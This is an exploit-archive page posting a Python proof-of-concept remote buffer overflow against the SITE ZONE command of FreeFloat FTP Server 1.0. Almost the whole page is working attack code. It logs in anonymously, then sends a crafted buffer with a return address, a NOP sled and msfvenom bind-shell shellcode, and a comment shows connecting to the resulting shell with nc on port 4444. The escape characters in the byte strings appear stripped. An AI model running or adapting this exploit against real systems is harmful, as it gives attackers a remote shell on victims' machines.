Home / os / winmobile

Freefloat FTP Server 1.0 SITE ZONE Buffer Overflow

Posted on 05 November 2016

#!/usr/bin/env python
#-*- coding: utf-8 -*-

# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a

import socket

# shellcode with metasploit:
# msfvenom -p windows/shell_bind_tcp -b 'x00x0Ax0D' -f c
# nc 192.168.1.150 4444

ret = "x2Fx1DxF1x77" # GDI32.dll
shellcode = ("xb8x78xa3x16x0cxddxc2xd9x74x24xf4x5bx31xc9xb1"
"x53x31x43x12x83xebxfcx03x3bxadxf4xf9x47x59x7a"
"x01xb7x9ax1bx8bx52xabx1bxefx17x9cxabx7bx75x11"
"x47x29x6dxa2x25xe6x82x03x83xd0xadx94xb8x21xac"
"x16xc3x75x0ex26x0cx88x4fx6fx71x61x1dx38xfdxd4"
"xb1x4dx4bxe5x3ax1dx5dx6dxdfxd6x5cx5cx4ex6cx07"
"x7ex71xa1x33x37x69xa6x7ex81x02x1cxf4x10xc2x6c"
"xf5xbfx2bx41x04xc1x6cx66xf7xb4x84x94x8axcex53"
"xe6x50x5ax47x40x12xfcxa3x70xf7x9bx20x7exbcxe8"
"x6ex63x43x3cx05x9fxc8xc3xc9x29x8axe7xcdx72x48"
"x89x54xdfx3fxb6x86x80xe0x12xcdx2dxf4x2ex8cx39"
"x39x03x2exbax55x14x5dx88xfax8exc9xa0x73x09x0e"
"xc6xa9xedx80x39x52x0ex89xfdx06x5exa1xd4x26x35"
"x31xd8xf2xa0x39x7fxadxd6xc4x3fx1dx57x66xa8x77"
"x58x59xc8x77xb2xf2x61x8ax3dxedx2dx03xdbx67xde"
"x45x73x1fx1cxb2x4cxb8x5fx90xe4x2ex17xf2x33x51"
"xa8xd0x13xc5x23x37xa0xf4x33x12x80x61xa3xe8x41"
"xc0x55xecx4bxb2xf6x7fx10x42x70x9cx8fx15xd5x52"
"xc6xf3xcbxcdx70xe1x11x8bxbbxa1xcdx68x45x28x83"
"xd5x61x3ax5dxd5x2dx6ex31x80xfbxd8xf7x7ax4axb2"
"xa1xd1x04x52x37x1ax97x24x38x77x61xc8x89x2ex34"
"xf7x26xa7xb0x80x5ax57x3ex5bxdfx67x75xc1x76xe0"
"xd0x90xcax6dxe3x4fx08x88x60x65xf1x6fx78x0cxf4"
"x34x3exfdx84x25xabx01x3ax45xfe")

buffer = 'x90' * 30 + shellcode
buffer1 = 'x4C' * 242 + ret + buffer + 'x41' * (749-len(buffer))
print "Sending Buffer"

s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
s.send('USER anonymous
')
s.recv(1024)
s.send('PASS anonymous
')
s.recv(1024)
s.send('SITE ZONE' + buffer1 + '
')
s.close()

 

TOP

Malware :

Exploits :